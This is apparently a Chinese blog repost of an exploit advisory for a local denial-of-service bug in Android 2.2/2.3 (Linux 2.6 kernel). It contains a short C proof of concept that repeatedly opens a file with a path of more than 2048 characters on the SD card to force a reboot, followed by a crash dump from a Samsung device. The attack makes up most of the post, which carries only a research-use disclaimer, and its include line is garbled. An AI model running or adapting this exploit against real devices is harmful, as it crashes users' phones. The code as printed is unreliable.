安卓基于linux2.6内核,Android Linux Kernel 2.6本地DoS

*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。# Exploit Title: Android Kernel 2.6 Local DoS

# Date: 12/7/12

# Author: G13

# Twitter: @g13net

# Versions: Android 2.2, 2.3

# Category: DoS (android)

保留以上原文信息

多次尝试执行将一个文件名长度大于或等于2048的文件写入到SD卡(vfat文件系统)时会引起Android操作系统产生一个本地DoS

利用条件:Linux Kernel 2.6(其实就是ICS以前的版本)

成功运行利用代码可以导致系统重启

#include

int main(int argc, char** argv) {

char buf[5000];

int j,k;

FILE *fp;

/* Path to sdcard, typically /sdcard/ */

strcpy(buf,"/sdcard/");

for(k=0;k<=2048;k++){

strcat(buf,"A");

};

for(j=0;j<=50;j++){

fp=fopen(buf,"w");

};

return 0;

}

以下是系统调试信息

*** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***

Build fingerprint:

'verizon/SCH-I800/SCH-I800:2.3.4/GINGERBREAD/EF01:user/release-keys'

pid: 349, tid: 363, name: SensorService >>> system_server <<<

signal 8 (SIGFPE), code -6 (?), fault addr 0000015d

r0 00000000 r1 00000008 r2 00000040 r3 00000000

r4 2a114310 r5 00000000 r6 51504690 r7 00000025

r8 2a114330 r9 2a114350 sl 00000003 fp 00000003

ip fffd4084 sp 51501eb0 lr 40039b70 pc 40037cf0 cpsr 20030010

d0 4271bc7bd0b80000 d1 0000000000000000

d2 0000000000000000 d3 427181eae9200000

d4 0000000000000000 d5 0000000000000000

d6 0000000000000000 d7 0000000000000000

d8 0000000000000000 d9 0000000000000000

d10 0000000000000000 d11 0000000000000000

d12 0000000000000000 d13 0000000000000000

d14 0000000000000000 d15 0000000000000000

d16 3fe99999a0000000 d17 3fe999999999999a

d18 0033003200310030 d19 0000000000000000

d20 3fc554e7eb0eb47c d21 3e66376972bea4d0

d22 3f4de16b9c24a98f d23 3fb0f4a31edab38b

d24 3fede16b9c24a98f d25 3fe55559ee5e69f9

d26 0000000000000000 d27 0000000000000000

d28 0000000000000005 d29 0000000000000000

d30 0000000000000000 d31 0000000000000000

scr 20000010

backtrace:

#00 pc 0000dcf0 /system/lib/libc.so (kill+12)

#01 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)

#02 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)

#03 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)

#04 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)

#05 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)

#06 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)

#07 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)

#08 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)

#09 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)

#10 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)

#11 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)

#12 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)

#13 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)

#14 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)

#15 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)

#16 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值